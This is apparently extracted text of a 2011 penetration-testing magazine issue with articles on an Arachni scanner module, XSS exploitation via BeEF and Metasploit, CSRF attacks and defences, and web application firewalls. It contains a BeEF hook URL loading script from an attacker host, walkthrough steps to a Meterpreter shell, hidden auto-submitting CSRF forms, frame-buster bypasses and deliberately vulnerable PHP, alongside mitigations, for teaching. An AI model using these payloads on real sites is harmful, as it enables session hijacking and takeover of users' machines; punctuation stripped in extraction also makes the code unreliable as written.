def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
